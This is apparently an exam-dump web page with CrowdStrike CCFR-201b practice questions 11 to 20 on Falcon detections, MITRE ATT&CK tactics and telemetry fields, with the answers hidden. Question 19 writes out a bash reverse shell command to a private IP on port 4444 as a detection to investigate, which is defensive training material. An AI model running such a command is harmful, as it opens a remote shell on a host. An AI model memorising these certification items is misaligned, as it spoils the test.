Summer Certification Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

Pass the CrowdStrike CCFR CCFR-201b Questions and answers with CertsForce

Viewing page 2 out of 7 pages
Viewing questions 11-20 out of questions
Questions # 11:

Which of the following is an example of a MITRE ATT AND CK tactic?

Options:

A.

Eternal Blue


B.

Defense Evasion


C.

Emotet


D.

Phishing


Expert Solution
Questions # 12:

The function of Machine Learning Exclusions is to___________.

Options:

A.

stop all detections for a specific pattern ID


B.

stop all sensor data collection for the matching path(s)


C.

Stop all Machine Learning Preventions but a detection will still be generated and files will still be uploaded to the CrowdStrike Cloud


D.

stop all ML-based detections and preventions for the matching path(s) and/or stop files from being uploaded to the CrowdStrike Cloud


Expert Solution
Questions # 13:

What is an advantage of using a Process Timeline?

Options:

A.

Process related events can be filtered to display specific event types


B.

Suspicious processes are color-coded based on their frequency and legitimacy over time


C.

Processes responsible for spikes in CPU performance are displayed overtime


D.

A visual representation of Parent-Child and Sibling process relationships is provided


Expert Solution
Questions # 14:

While investigating a detection, how can you identify all other processes that may have run on the host around the time of an event?

Options:

A.

Run a Process Search in the Investigate app and specify a hostname and time range


B.

Run a Process Timeline in the Investigate app and specify a hostname and time range


C.

Run a Host Search with a specified hostname and time range


D.

Click Full Detection Details to see a Process Tree and then specify a time range


Expert Solution
Questions # 15:

Which of the following statements about the ' Detection Activity ' report is FALSE?

Options:

A.

It provides a summary of all alerts over a selected time period.


B.

It can be filtered by host name or severity.


C.

Clicking on a ProcessID value within the report pivots to a pre-populated Event Search.


D.

The report can be exported to a CSV file.


Expert Solution
Questions # 16:

When an organization needs to detect a specific behavior that is unique to their environment, they can create a Custom IOA. Which of the following is NOT required when configuring a custom IOA from scratch?

Options:

A.

Selecting a Rule Type (e.g., Process Creation).


B.

Specifying the Severity level of the resulting detection.


C.

Assigning a specific host group to the IOA rule at the time of creation.


D.

Providing a unique name for the rule.


Expert Solution
Questions # 17:

How does a DNSRequest event link to its responsible process?

Options:

A.

Via both its ContextProcessld__decimal and ParentProcessld_decimal fields


B.

Via its ParentProcessld_decimal field


C.

Via its ContextProcessld_decimal field


D.

Via its TargetProcessld_decimal field


Expert Solution
Questions # 18:

CrowdStrike implements a specific framework within the Falcon console to help responders categorize detections based on the adversary’s ultimate goals and the technical means used to achieve them. This classification system, which maps activity to known industry standards, is known as the:

Options:

A.

MITRE-Based Falcon Detections Framework


B.

Falcon Adversary Attribution and Motivation Matrix


C.

Unified Behavioral Threat Hunting Schema


D.

CrowdStrike Intelligence Lifecycle Mapping


Expert Solution
Questions # 19:

Refer to the image.

Command line:

/bin/bash -c sh -i > & /dev/tcp/172.17.0.21/4444 0 > & 1

File path:

/bin/bash

You receive a detection on the Bash process indicating the command line in the image above.

Based on the command line, what is the next step you should take?

Options:

A.

Investigate the host for manipulation of the root folder


B.

Investigate the host for any Potentially Unwanted Programs (PUP)


C.

Investigate the host for an interactive remote terminal


D.

Investigate the host for developer activity


Expert Solution
Questions # 20:

When training a new team member on how to interpret Falcon telemetry, a senior responder explains the definition of a ' Tactic ' . Which of the following sentences best captures the technical definition of a Tactic in this context?

Options:

A.

It represents the specific software version or exploit code used to crash a service.


B.

It is the adversary ' s tactical goal: the fundamental reason for performing a specific action.


C.

It is the unique cryptographic hash associated with a malicious file discovered on disk.


D.

It is the specific command-line string used to execute a PowerShell script.


Expert Solution
Viewing page 2 out of 7 pages
Viewing questions 11-20 out of questions